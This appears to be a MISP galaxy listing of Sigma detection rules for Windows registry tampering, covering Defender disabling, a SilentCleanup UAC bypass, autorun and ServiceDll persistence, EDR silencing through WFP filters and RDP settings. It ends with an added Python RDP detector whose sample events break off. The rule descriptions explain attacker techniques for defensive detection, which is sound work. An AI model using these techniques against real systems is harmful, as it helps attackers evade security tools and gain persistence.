UUID 0eb46774-f1ab-4a74-8238-1155855f2263 which can be used as unique global reference for Disable Windows Defender Functionalities Via Registry Keys in MISP communities and other software using the MISP galaxy
External references
- https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/ - webarchive
- https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html - webarchive
- https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html - webarchive
- https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
- https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel |
| creation_date | 2022-08-01 |
| falsepositive | ['Administrator actions via the Windows Defender interface', 'Third party Antivirus'] |
| filename | registry_set_windows_defender_tamper.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Bypass UAC Using SilentCleanup Task
Detects the setting of the environment variable "windir" to a non-default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task, which runs %windir%\system32\cleanmgr.exe, is an auto-elevated task that can be abused to run any file with administrator privileges without a UAC prompt.
Internal MISP references
UUID 724ea201-6514-4f38-9739-e5973c34f49a which can be used as unique global reference for Bypass UAC Using SilentCleanup Task in MISP communities and other software using the MISP galaxy
External references
- https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ - webarchive
- https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nextron Systems |
| creation_date | 2022-01-06 |
| falsepositive | ['Unknown'] |
| filename | registry_set_bypass_uac_using_silentcleanup_task.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002'] |
Classes Autorun Keys Modification
Detects modification of autostart extensibility points (ASEPs) in the registry.
Internal MISP references
UUID 9df5f547-c86a-433e-b533-f2794357e242 which can be used as unique global reference for Classes Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_classes.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Potential SentinelOne Shell Context Menu Scan Command Tampering
Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
Internal MISP references
UUID 6c304b02-06e6-402d-8be4-d5833cdf8198 which can be used as unique global reference for Potential SentinelOne Shell Context Menu Scan Command Tampering in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-03-06 |
| falsepositive | ['Unknown'] |
| filename | registry_set_sentinelone_shell_context_tampering.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Potential AutoLogger Sessions Tampering
Detects tampering with AutoLogger trace sessions, a technique used by attackers to disable logging.
Internal MISP references
UUID f37b4bce-49d0-4087-9f5b-58bffda77316 which can be used as unique global reference for Potential AutoLogger Sessions Tampering in MISP communities and other software using the MISP galaxy
External references
- https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
- https://twitter.com/MichalKoczwara/status/1553634816016498688 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-01 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disable_autologger_sessions.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Registry Modification to Hidden File Extension
Detects registry modifications that hide file extensions in Windows Explorer.
Internal MISP references
UUID 5df86130-4e95-4a54-90f7-26541b40aec2 which can be used as unique global reference for Registry Modification to Hidden File Extension in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd - webarchive
- https://unit42.paloaltonetworks.com/ransomware-families/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-22 |
| falsepositive | ['Administrative scripts'] |
| filename | registry_set_hidden_extention.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1137'] |
Winget Admin Settings Modification
Detects changes to the AppInstaller (winget) admin settings, such as enabling local manifest installations or disabling installer hash checks.
Internal MISP references
UUID 6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236 which can be used as unique global reference for Winget Admin Settings Modification in MISP communities and other software using the MISP galaxy
External references
- https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget - webarchive
- https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winget_admin_settings_tampering.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-04-17 |
| falsepositive | ["The event doesn't contain information about the type of change. False positives are expected with legitimate changes"] |
| filename | registry_set_winget_admin_settings_tampering.yml |
| level | low |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence'] |
CurrentVersion NT Autorun Keys Modification
Detects modification of autostart extensibility points (ASEPs) in the registry.
Internal MISP references
UUID cbf93e5d-ca6c-4722-8bea-e9119007c248 which can be used as unique global reference for CurrentVersion NT Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_currentversion_nt.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Potential Persistence Via Shim Database In Uncommon Location
Detects the installation of a new shim database whose file is located in a non-default location.
Internal MISP references
UUID 6b6976a3-b0e6-4723-ac24-ae38a737af41 which can be used as unique global reference for Potential Persistence Via Shim Database In Uncommon Location in MISP communities and other software using the MISP galaxy
External references
- https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf - webarchive
- https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-01 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_shim_database_uncommon_location.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.011'] |
ServiceDll Hijack
Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.
Internal MISP references
UUID 612e47e9-8a59-43a6-b404-f48683f45bd6 which can be used as unique global reference for ServiceDll Hijack in MISP communities and other software using the MISP galaxy
External references
- https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-04 |
| falsepositive | ['Administrative scripts', 'Installation of a service'] |
| filename | registry_set_servicedll_hijack.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003'] |
WinSock2 Autorun Keys Modification
Detects modification of autostart extensibility points (ASEPs) in the registry.
Internal MISP references
UUID d6c2ce7e-afb5-4337-9ca4-4b5254ed0565 which can be used as unique global reference for WinSock2 Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_winsock2.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Add Port Monitor Persistence in Registry
Detects the registration of a new port monitor in the registry. Adversaries may use port monitors to run an attacker-supplied DLL during system boot for persistence or privilege escalation. A port monitor can be registered through the AddMonitor API call, causing the specified DLL to be loaded at startup.
Internal MISP references
UUID 944e8941-f6f6-4ee8-ac05-1c224e923c0e which can be used as unique global reference for Add Port Monitor Persistence in Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-30 |
| falsepositive | ['Unknown'] |
| filename | registry_set_add_port_monitor.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.010'] |
WFP Filter Added via Registry
Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
Internal MISP references
UUID 1f1d8209-636e-4c6c-a137-781cca8b82f9 which can be used as unique global reference for WFP Filter Added via Registry in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpoint-security-solutions.html - webarchive
- https://www.huntress.com/blog/silencing-the-edr-silencers - webarchive
- https://github.com/netero1010/EDRSilencer/blob/0e73a7037ec65c52894d8208e6f605a7da0a34a6/EDRSilencer.c - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_wfp_filter_added.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Frack113 |
| creation_date | 2025-10-23 |
| falsepositive | ['Unknown'] |
| filename | registry_set_susp_wfp_filter_added.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1562', 'attack.t1569.002'] |
Persistence Via Disk Cleanup Handler - Autorun
Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible: any developer can extend the available disk cleanup services by implementing and registering their own disk cleanup handler.
Internal MISP references
UUID d4e2745c-f0c6-4bde-a3ab-b553b3f693cc which can be used as unique global reference for Persistence Via Disk Cleanup Handler - Autorun in MISP communities and other software using the MISP galaxy
External references
- https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ - webarchive
- https://persistence-info.github.io/Data/diskcleanuphandler.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disk_cleanup_handler_autorun_persistence.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
DNS-over-HTTPS Enabled by Registry
Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or to conceal the exfiltration of data. With this enabled, an organization loses visibility into data such as query type, response and originating IP, which are used to identify bad actors.
Internal MISP references
UUID 04b45a8a-d11d-49e4-9acc-4a1b524407a5 which can be used as unique global reference for DNS-over-HTTPS Enabled by Registry in MISP communities and other software using the MISP galaxy
External references
- https://github.com/elastic/detection-rules/issues/1371 - webarchive
- https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - webarchive
- https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode - webarchive
- https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer |
| creation_date | 2021-07-22 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_dns_over_https_enabled.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1140', 'attack.t1112'] |
Scripted Diagnostics Turn Off Check Enabled - Registry
Detects enabling of the TurnOffCheck value, which can be used to bypass the mitigation for the MSDT Follina vulnerability.
Internal MISP references
UUID 7d995e63-ec83-4aa3-89d5-8a17b5c87c86 which can be used as unique global reference for Scripted Diagnostics Turn Off Check Enabled - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christopher Peacock @securepeacock, SCYTHE @scythe_io |
| creation_date | 2022-06-15 |
| falsepositive | ['Administrator actions'] |
| filename | registry_set_enabling_turnoffcheck.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Activate Suppression of Windows Security Center Notifications
Detects setting Notification_Suppress to 1, which disables Windows Security Center notifications.
Internal MISP references
UUID 0c93308a-3f1b-40a9-b649-57ea1a1c1d63 which can be used as unique global reference for Activate Suppression of Windows Security Center Notifications in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-19 |
| falsepositive | ['Unknown'] |
| filename | registry_set_suppress_defender_notifications.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Persistence Via Hhctrl.ocx
Detects when an attacker modifies the registry value of "hhctrl" to point to a custom binary.
Internal MISP references
UUID f10ed525-97fe-4fed-be7c-2feecca941b1 which can be used as unique global reference for Persistence Via Hhctrl.ocx in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_hhctrl_persistence.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
New BgInfo.EXE Custom VBScript Registry Configuration
Detects the setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe".
Internal MISP references
UUID 992dd79f-dde8-4bb0-9085-6350ba97cfb3 which can be used as unique global reference for New BgInfo.EXE Custom VBScript Registry Configuration in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-16 |
| falsepositive | ['Legitimate VBScript'] |
| filename | registry_set_bginfo_custom_vbscript.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
CurrentControlSet Autorun Keys Modification
Detects modification of autostart extensibility points (ASEPs) in the registry.
Internal MISP references
UUID f674e36a-4b91-431e-8aef-f8a96c2aca35 which can be used as unique global reference for CurrentControlSet Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_currentcontrolset.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
CrashControl CrashDump Disabled
Detects disabling of the CrashDump via the registry (as used by HermeticWiper).
Internal MISP references
UUID 2ff692c2-4594-41ec-8fcb-46587de769e0 which can be used as unique global reference for CrashControl CrashDump Disabled in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tobias Michalski (Nextron Systems) |
| creation_date | 2022-02-24 |
| falsepositive | ['Legitimate disabling of crashdumps'] |
| filename | registry_set_crashdump_disabled.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1564', 'attack.t1112'] |
New BgInfo.EXE Custom WMI Query Registry Configuration
Detects the setting of a new registry value related to BgInfo configuration, which can be abused to execute a custom WMI query via "BgInfo.exe".
Internal MISP references
UUID cd277474-5c52-4423-a52b-ac2d7969902f which can be used as unique global reference for New BgInfo.EXE Custom WMI Query Registry Configuration in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-16 |
| falsepositive | ['Legitimate WMI query'] |
| filename | registry_set_bginfo_custom_wmi_query.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Trust Access Disable For VBApplications
Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
Internal MISP references
UUID 1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf which can be used as unique global reference for Trust Access Disable For VBApplications in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ - webarchive
- https://twitter.com/inversecos/status/1494174785621819397 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2020-05-22 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_office_access_vbom_tamper.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Potential Registry Persistence Attempt Via Windows Telemetry
Detects potential persistence behavior using the Windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collection. This binary was created to be easily extensible and, to that end, it relies on the registry to instruct it which commands to run. The problem is that it will run any arbitrary command without restriction on location or type.
Internal MISP references
UUID 73a883d0-0348-4be4-a8d8-51031c2564f8 which can be used as unique global reference for Potential Registry Persistence Attempt Via Windows Telemetry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Lednyov Alexey, oscd.community, Sreeman |
| creation_date | 2020-10-16 |
| falsepositive | ['Unknown'] |
| filename | registry_set_telemetry_persistence.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1053.005'] |
Potential Persistence Via App Paths Default Property
Detects changes to the "Default" property of keys located under the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry path, which might be used as a method of persistence. The entries found under App Paths are used primarily for two purposes: first, to map an application's executable file name to that file's fully qualified path; second, to prepend information to the PATH environment variable on a per-application, per-process basis.
Internal MISP references
UUID 707e097c-e20f-4f67-8807-1f72ff4500d6 which can be used as unique global reference for Potential Persistence Via App Paths Default Property in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows/win32/shell/app-registration - webarchive
- https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-10 |
| falsepositive | ['Legitimate applications registering their binary from one of the suspicious locations mentioned above (tune it)'] |
| filename | registry_set_persistence_app_paths.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.012'] |
RDP Sensitive Settings Changed to Zero
Detects tampering with sensitive RDP Terminal Service/Server settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'.
Internal MISP references
UUID a2863fbc-d5cb-48d5-83fb-d976d4b1743b which can be used as unique global reference for RDP Sensitive Settings Changed to Zero in MISP communities and other software using the MISP galaxy
External references
- http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ - webarchive
- https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services - webarchive
- https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ - webarchive
- https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html - webarchive
- https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 - webarchive
- https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html - webarchive
- http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali |
| creation_date | 2022-09-29 |
| falsepositive | ['Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)'] |
| filename | registry_set_terminal_server_suspicious.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
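As an added example (not code from the SigmaHQ rule file or its authors), the following Python applies the rule's idea, a sensitive Terminal Services value being set to DWORD 0, to constructed Sysmon Event ID 13 (registry value set) records. The key fragments, the value-name watch list and the sample events are assumptions made for this example; the published rule's selection may differ.

```python
import re

# Key fragments under which RDP / Terminal Services settings live: the live
# control key and the Group Policy key (assumed; both appear in the rule's references).
RDP_KEY_FRAGMENTS = (
    "\\control\\terminal server\\",
    "\\policies\\microsoft\\windows nt\\terminal services\\",
)

# Values whose zeroing weakens or silently enables RDP (assumed watch list).
SENSITIVE_VALUES = {
    "fdenytsconnections": "RDP connections enabled (deny flag cleared)",
    "userauthentication": "Network Level Authentication disabled",
    "securitylayer": "security layer lowered to legacy RDP encryption",
    "fallowunsolicited": "unsolicited Remote Assistance policy zeroed",
    "fallowunsolicitedfullcontrol": "unsolicited Remote Assistance full-control policy zeroed",
}

_DWORD_RE = re.compile(r"^DWORD \((0x[0-9A-Fa-f]{8})\)$")


def parse_dword(details):
    """Sysmon renders REG_DWORD data as 'DWORD (0x0000002A)'; return the int or None."""
    match = _DWORD_RE.match(details or "")
    return int(match.group(1), 16) if match else None


def rdp_zeroed_setting(event):
    """Return a finding for a value-set event that zeroes a sensitive RDP value, else None."""
    if event.get("EventID") != 13:
        return None
    target = event.get("TargetObject", "")
    lowered = target.lower()
    if not any(fragment in lowered for fragment in RDP_KEY_FRAGMENTS):
        return None
    value_name = lowered.rsplit("\\", 1)[-1]
    reason = SENSITIVE_VALUES.get(value_name)
    if reason is None or parse_dword(event.get("Details")) != 0:
        return None
    return f"{reason}: {target} (Image={event.get('Image', '?')})"


def scan(events):
    return [finding for finding in map(rdp_zeroed_setting, events) if finding]


# Constructed sample telemetry, not real logs.
TS = "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\"
GPO = "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\"
SAMPLE_EVENTS = [
    # RDP enabled with reg.exe: fires.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": TS + "fDenyTSConnections", "Details": "DWORD (0x00000000)"},
    # NLA disabled on the listener: fires.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": TS + "WinStations\\RDP-Tcp\\UserAuthentication", "Details": "DWORD (0x00000000)"},
    # Same setting pushed through the policy key: fires (the rule's stated false positive).
    {"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": GPO + "fDenyTSConnections", "Details": "DWORD (0x00000000)"},
    # Deny flag set to 1 is hardening, not tampering: no finding.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe",
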